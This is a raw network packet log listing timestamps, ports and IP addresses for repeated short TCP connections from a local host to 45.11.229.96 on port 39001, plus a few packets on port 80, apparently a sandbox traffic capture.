Sep 19, 2024 02:25:55.381382942 CEST	49762	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.386523962 CEST	39001	49762	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.386600018 CEST	49762	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.391544104 CEST	39001	49762	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.981045008 CEST	39001	49762	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.981182098 CEST	49762	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.985553980 CEST	49762	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.990434885 CEST	39001	49762	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.092349052 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.097589016 CEST	39001	49763	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.097810030 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.188606024 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.193881989 CEST	39001	49763	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.193988085 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.199062109 CEST	39001	49763	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.755310059 CEST	39001	49763	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.755377054 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.755546093 CEST	49763	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.760307074 CEST	39001	49763	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.872955084 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.878042936 CEST	39001	49764	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.878130913 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.894025087 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.899033070 CEST	39001	49764	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:56.899090052 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:56.903943062 CEST	39001	49764	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:57.498632908 CEST	39001	49764	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:57.498707056 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.501400948 CEST	49764	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.506402969 CEST	39001	49764	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:57.607378006 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.612552881 CEST	39001	49765	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:57.612646103 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.640027046 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.644974947 CEST	39001	49765	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:57.645153999 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:57.649919033 CEST	39001	49765	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.251293898 CEST	39001	49765	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.251543045 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.251543999 CEST	49765	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.256597042 CEST	39001	49765	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.358387947 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.363626003 CEST	39001	49766	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.363743067 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.377410889 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.382313013 CEST	39001	49766	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.382483959 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.387357950 CEST	39001	49766	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.979330063 CEST	39001	49766	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:58.979437113 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.979533911 CEST	49766	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:58.984368086 CEST	39001	49766	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:59.135574102 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.140784979 CEST	39001	49767	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:59.141109943 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.152664900 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.157563925 CEST	39001	49767	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:59.157660007 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.162434101 CEST	39001	49767	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:59.922653913 CEST	39001	49767	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:59.922748089 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.922883034 CEST	49767	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:59.927714109 CEST	39001	49767	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.029845953 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.218106985 CEST	39001	49768	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.218211889 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.237543106 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.242784977 CEST	39001	49768	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.242877007 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.248094082 CEST	39001	49768	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.883290052 CEST	39001	49768	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.883440971 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.890037060 CEST	49768	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:00.894926071 CEST	39001	49768	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:00.998275995 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.003289938 CEST	39001	49769	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.003374100 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.068265915 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.073755980 CEST	39001	49769	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.073848963 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.078743935 CEST	39001	49769	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.673158884 CEST	39001	49769	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.673326015 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.673460007 CEST	49769	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.678348064 CEST	39001	49769	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.778930902 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.783989906 CEST	39001	49770	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.786163092 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.800318956 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.805170059 CEST	39001	49770	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:01.806144953 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:01.811019897 CEST	39001	49770	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:02.439558029 CEST	39001	49770	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:02.442183971 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.442286968 CEST	49770	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.447082043 CEST	39001	49770	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:02.560372114 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.565315962 CEST	39001	49772	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:02.565432072 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.601092100 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.607274055 CEST	39001	49772	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:02.607356071 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:02.612252951 CEST	39001	49772	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:03.211507082 CEST	39001	49772	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:03.211636066 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.266108990 CEST	49772	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.271176100 CEST	39001	49772	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:03.443147898 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.448425055 CEST	39001	49773	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:03.448515892 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.513937950 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.519011974 CEST	39001	49773	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:03.519088030 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:03.524162054 CEST	39001	49773	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.065649986 CEST	39001	49773	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.065742016 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.065865993 CEST	49773	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.070734978 CEST	39001	49773	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.169864893 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.174837112 CEST	39001	49774	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.178183079 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.194067955 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.199134111 CEST	39001	49774	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.199244022 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.204144955 CEST	39001	49774	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.820972919 CEST	39001	49774	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.821090937 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.821223021 CEST	49774	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.826241970 CEST	39001	49774	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.935214043 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.940186024 CEST	39001	49775	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.940383911 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.954380035 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.959247112 CEST	39001	49775	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:04.959331036 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:04.964440107 CEST	39001	49775	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:05.573592901 CEST	39001	49775	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:05.573692083 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.573798895 CEST	49775	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.578938007 CEST	39001	49775	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:05.685444117 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.690598011 CEST	39001	49776	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:05.690704107 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.703217030 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.708215952 CEST	39001	49776	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:05.708318949 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:05.713257074 CEST	39001	49776	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:06.337702990 CEST	39001	49776	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:06.337817907 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.337965012 CEST	49776	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.342777014 CEST	39001	49776	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:06.450825930 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.456022024 CEST	39001	49777	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:06.456110001 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.469521999 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.476090908 CEST	39001	49777	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:06.476150036 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:06.481235027 CEST	39001	49777	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.089340925 CEST	39001	49777	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.090136051 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.090265036 CEST	49777	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.095176935 CEST	39001	49777	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.201152086 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.206048012 CEST	39001	49778	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.206175089 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.219767094 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.225676060 CEST	39001	49778	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.225779057 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.231555939 CEST	39001	49778	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.852729082 CEST	39001	49778	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.854191065 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.854396105 CEST	49778	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.859168053 CEST	39001	49778	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.973558903 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:07.978539944 CEST	39001	49779	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:07.978645086 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.029126883 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.034001112 CEST	39001	49779	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.034255028 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.039184093 CEST	39001	49779	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.622333050 CEST	39001	49779	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.622452021 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.622745991 CEST	49779	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.631597042 CEST	39001	49779	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.732249022 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.737257957 CEST	39001	49780	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.737323999 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.768517971 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.773500919 CEST	39001	49780	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:08.773552895 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:08.778361082 CEST	39001	49780	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:09.366508007 CEST	39001	49780	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:09.366569042 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.366729021 CEST	49780	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.371522903 CEST	39001	49780	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:09.482263088 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.487190008 CEST	39001	49781	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:09.487282991 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.499243975 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.504120111 CEST	39001	49781	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:09.504193068 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:09.513851881 CEST	39001	49781	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.139801025 CEST	39001	49781	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.139904022 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.140017986 CEST	49781	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.144804001 CEST	39001	49781	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.247961998 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.254270077 CEST	39001	49782	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.254400969 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.267203093 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.271986961 CEST	39001	49782	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.272089958 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.277822018 CEST	39001	49782	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.884114027 CEST	39001	49782	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:10.884205103 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.884319067 CEST	49782	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:10.889085054 CEST	39001	49782	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.000478983 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.005389929 CEST	39001	49783	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.005502939 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.301378965 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.306154013 CEST	39001	49783	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.306209087 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.310965061 CEST	39001	49783	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.347749949 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:26:11.387537956 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:26:11.650850058 CEST	39001	49783	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.650933027 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.651216030 CEST	49783	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.655996084 CEST	39001	49783	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.763367891 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.768588066 CEST	39001	49784	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.768686056 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.798326015 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.803818941 CEST	39001	49784	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:11.803888083 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:11.808712006 CEST	39001	49784	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.406090021 CEST	39001	49784	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.406200886 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.408138990 CEST	49784	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.416066885 CEST	39001	49784	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.528903961 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.535898924 CEST	39001	49785	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.536000967 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.545464039 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:26:12.548213005 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.556370974 CEST	39001	49785	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.556453943 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:12.562175035 CEST	39001	49785	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:12.590667963 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:26:13.185206890 CEST	39001	49785	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.185303926 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.185405016 CEST	49785	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.190232038 CEST	39001	49785	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.294516087 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.299487114 CEST	39001	49786	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.299577951 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.311180115 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.316112041 CEST	39001	49786	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.316184998 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.321096897 CEST	39001	49786	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.922308922 CEST	39001	49786	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:13.922398090 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.922625065 CEST	49786	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:13.927531958 CEST	39001	49786	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.029908895 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.034986973 CEST	39001	49787	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.035092115 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.048540115 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.053364038 CEST	39001	49787	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.053456068 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.058296919 CEST	39001	49787	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.704380989 CEST	39001	49787	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.704473972 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.704654932 CEST	49787	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.709441900 CEST	39001	49787	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.810342073 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.815310001 CEST	39001	49788	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.815409899 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.827868938 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.832812071 CEST	39001	49788	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:14.832900047 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:14.837718964 CEST	39001	49788	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:15.473227978 CEST	39001	49788	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:15.473329067 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.473490953 CEST	49788	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.478218079 CEST	39001	49788	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:15.591562986 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.596503973 CEST	39001	49789	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:15.596604109 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.608951092 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.613964081 CEST	39001	49789	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:15.614042997 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:15.618854046 CEST	39001	49789	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.221995115 CEST	39001	49789	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.222104073 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.222240925 CEST	49789	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.226996899 CEST	39001	49789	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.341887951 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.346826077 CEST	39001	49790	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.346913099 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.360169888 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.364995003 CEST	39001	49790	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.365075111 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.369977951 CEST	39001	49790	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.979156017 CEST	39001	49790	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:16.979264021 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.979402065 CEST	49790	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:16.984150887 CEST	39001	49790	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.091526031 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.096411943 CEST	39001	49791	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.097301960 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.110586882 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.115367889 CEST	39001	49791	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.115437031 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.120274067 CEST	39001	49791	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.742662907 CEST	39001	49791	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.742734909 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.742883921 CEST	49791	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.747584105 CEST	39001	49791	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.857690096 CEST	49792	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.967452049 CEST	39001	49792	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.967621088 CEST	49792	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.978235960 CEST	49792	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:17.983058929 CEST	39001	49792	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:17.983130932 CEST	49792	39001	192.168.2.5	45.11.229.96
